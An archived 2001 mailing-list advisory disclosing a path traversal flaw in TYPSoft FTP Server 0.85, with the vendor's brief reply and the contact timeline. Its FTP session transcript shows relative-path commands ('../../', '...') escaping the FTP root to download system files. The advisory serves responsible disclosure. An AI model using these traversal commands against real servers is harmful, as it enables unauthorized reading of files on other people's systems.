OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: joetestaHUSHMAIL.COM
Date: Wed Feb 28 2001 - 17:27:57 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    ----- Begin Hush Signed Message from joetestahushmail.com -----

    Vulnerability in TYPSoft FTP Server

        Overview

    TYPSoft FTP Server v0.85 is an ftp server available from
    http://www.webmasterfree.com and http://typsoft.n3.net. A vulnerability
    exists which allows a remote attacker to break out of the ftp root using
    relative paths (ie: '...').

        Details

    The following is an illustration of the problem:

    % ftp localhost
    Connected to xxxxxxxxxx.rh.rit.edu.
    220 TYPSoft FTP Server 0.85 ready...
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Password required for jdog.
    Password:
    230 User jdog logged in.
    ftp> pwd
    257 "/C:/directory/directory/" is current directory.
    ftp> get ../../autoexec.bat
    200 Port command successful.
    150 Opening data connection for ../../autoexec.bat.
    226 Transfer complete.
    ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
    ftp> cd ..
    501 CWD failed. No permission
    ftp> cd ...
    250 CWD command successful. "/C:/directory/directory/.../" is current directory.
    ftp> pwd
    257 "/C:/directory/directory/.../" is current directory.
    ftp> get config.sys
    200 Port command successful.
    150 Opening data connection for config.sys.
    226 Transfer complete.
    ftp: 89 bytes received in 0.05Seconds 1.78Kbytes/sec.
    ftp>

        Solution

    > Date: Sat, 24 Feb 2001 01:39:23 -0500
    > Subject: Re: Vulnerability in TYPSoft FTP Server
    > From: TYPSoft <typsoftaltern.org>
    > To: joetestahushmail.com
    >
    > Hi
    > I have try to fix this problem.
    > I test I have made seem to be OK.
    > Thanks for the report
    >
    > Marc
    > TYPSoft

        Unfortunately, I do not have the resources to verify this fix at
    this time. Thus, I urge users to proceed with caution.

        Vendor Status

    TYPSoft was contacted via <typsoftaltern.org> on Wednesday, February
    21, 2001.

        - Joe Testa ( e-mail: joetestahushmail.com / AIM: LordSpankatron )

    ----- Begin Hush Signature v1.3 -----
    CCyeaZ11wOzc4By+rx1GtdKkD9gDG1/WAGHJFUhNZz/sgpcfsBCSqSLWjwIoSl8Atqqv
    k83hLlTNlsRS5rzSkS+7yx37hSlR5mwy/2VC0DYd6g8/vMUSp2uQ59wfxZjasWeSx3t/
    sA61/cuAT30osMp9YCCy1i4+/7/ReyGJERQQtQIiLuVvN43EWcMVvTGmDJgOqvLErGVu
    I4seQjpawANb/Nis9zJbKYjbBycaew5xGeZ8d51tyt8It5sO/Pf7+2lKBYinWk7tV75/
    yrkEpVd23MXtn9xW0c+9GiwvUlUTyhKkfQe3crhHxJywTWhbq1MOp5pQMaksAm/87CQc
    y8+ZrbDW8SWKh3ozKiot5CgK4gMd2jSbLJ/IUxY8A2GisMU96GyGUTsC7Jzmng9UG/mK
    YlWtalAbucV/TJgHFyyy9zbmQ4X+TLez8ewrU6hXnOLwuW9K8Pgt1/2O99mdZMoU+Uuf
    g1Obvd2TlDtRwk9MNQcriBktRi03WJIJtomI74GIx5TO
    ----- End Hush Signature v1.3 -----

    This message has been signed with a Hush Digital Signature.
    To verify the signature, please go to www.hush.com/tools

    Free, encrypted, secure Web-based email at www.hushmail.com

    IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
    Get your FREE, totally secure email address at http://www.hushmail.com.